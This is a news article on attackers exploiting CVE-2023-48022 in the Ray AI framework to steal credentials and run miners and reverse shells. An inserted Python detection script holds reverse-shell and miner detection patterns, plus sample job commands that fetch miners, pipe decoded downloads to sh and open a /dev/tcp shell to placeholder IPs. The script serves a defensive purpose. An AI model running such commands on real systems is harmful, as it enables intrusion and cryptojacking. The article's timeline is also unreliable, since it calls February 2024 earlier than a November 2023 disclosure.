Vulnerability in Ray AI Framework Exploited, Hundreds of Clusters Compromised

Vulnerability in Ray AI Framework Exploited | CyberPro Magazine


Vulnerability Exploited in Ray AI Framework

An application security firm, Oligo, has issued a warning about attackers exploiting a significant vulnerability within the Ray AI framework. This vulnerability, identified as CVE-2023-48022 and disclosed in November 2023, has become a gateway for cybercriminals to infiltrate and compromise numerous clusters. The flaw stems from a missing authentication mechanism in the Ray framework’s default configuration, leaving it susceptible to exploitation. In essence, the framework lacks a robust authentication protocol and does not support any form of authorization model, rendering it vulnerable to malicious activities.

Attackers Exploit Vulnerability, Inflicting Widespread Damage

Exploiting this vulnerability, attackers have been able to breach hundreds of Ray clusters, according to reports from Oligo. By leveraging Ray’s job submission API, attackers can execute arbitrary system commands, granting them unauthorized access to all nodes within the cluster and facilitating the retrieval of critical credentials. The compromised clusters have become a treasure trove for cybercriminals, who have pilfered various sensitive information, including AI production workload data, database credentials, password hashes, SSH keys, and tokens from prominent platforms like OpenAI, HuggingFace, and Stripe. 

Moreover, several compromised clusters operated with elevated privileges, providing access to sensitive cloud services and potentially compromising customer data. Additionally, these breaches have exposed Kubernetes API access and Slack tokens, exacerbating the security risks posed by the exploitation of this vulnerability.

Oligo Unveils Scope of Attack and Detection Challenges

Oligo, which has dubbed the ongoing attack campaign ShadowRay, has shed light on the extensive damage caused by the exploitation of this vulnerability. The security firm has observed a proliferation of crypto miners, including XMRig, NBMiner, and Java-based Zephyr miners, along with the deployment of reverse shells for persistent access across compromised clusters. Notably, the first instance of a crypto-miner was detected in February 2024, indicating that the breach might have commenced before the vulnerability’s public disclosure.

Furthermore, Oligo highlights the sophisticated tactics employed by the attackers to evade detection, such as leveraging the open-source Interactsh service for connection requests. Because the exploited vulnerability is disputed, organizations remain unaware of their susceptibility to such attacks, which compounds the difficulty of detecting and mitigating these threats effectively.
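
A triage sketch for the indicators Oligo describes, added here as an example and not taken from Oligo or the Ray project: it scans job records, shaped like the list Ray's Jobs API returns, for entrypoints that reference the named miners, Interactsh callbacks or reverse-shell redirection, and it also looks inside base64-wrapped commands, which goes beyond what the article states. The field names, regexes, Interactsh domain pattern and sample records are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Indicator families come from the article; the regexes are assumptions.
RULES = {
    "crypto-miner": re.compile(r"xmrig|nbminer|zephyr", re.I),
    "interactsh-callback": re.compile(r"\.oast\.[a-z]+\b|\binteract\.sh\b", re.I),
    "reverse-shell": re.compile(r"/dev/tcp/|\bbash\s+-i\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def expand(entrypoint):
    """Return the entrypoint plus the decoded text of any base64 blobs in it."""
    views = [entrypoint]
    for token in B64_TOKEN.findall(entrypoint):
        try:
            views.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64-encoded text; skip it
    return views


def triage_jobs(jobs):
    """Map submission_id -> sorted names of the rules its entrypoint matched."""
    findings = {}
    for job in jobs:
        views = expand(job.get("entrypoint") or "")
        hits = sorted(n for n, rx in RULES.items() if any(rx.search(v) for v in views))
        if hits:
            findings[job.get("submission_id") or "<no id>"] = hits
    return findings


# Constructed sample records, not real incident data.
WRAPPED = base64.b64encode(b"wget -q http://198.51.100.7/nbminer -O /tmp/n").decode()
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_ok", "entrypoint": "python train.py --epochs 3"},
    {"submission_id": "raysubmit_a", "entrypoint": "curl -s http://files.example/xmrig -o /tmp/x"},
    {"submission_id": "raysubmit_b", "entrypoint": f"echo {WRAPPED} | base64 -d | sh"},
    {"submission_id": "raysubmit_c", "entrypoint": "nslookup abc123.oast.fun"},
    {"submission_id": "raysubmit_d", "entrypoint": "bash -c 'exec 5<>/dev/tcp/192.0.2.10/4444'"},
]

if __name__ == "__main__":
    for sid, hits in triage_jobs(SAMPLE_JOBS).items():
        print(sid, ", ".join(hits))
```

A match is a lead for review rather than proof of compromise, and a clean result does not show that a cluster was never reached.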

In conclusion, the exploitation of the vulnerability in the Ray AI framework underscores the critical importance of implementing robust authentication mechanisms and security protocols in AI infrastructure. As organizations grapple with the evolving threat landscape, collaborative efforts between developers, security experts, and end-users are imperative to fortify defenses against such malicious incursions.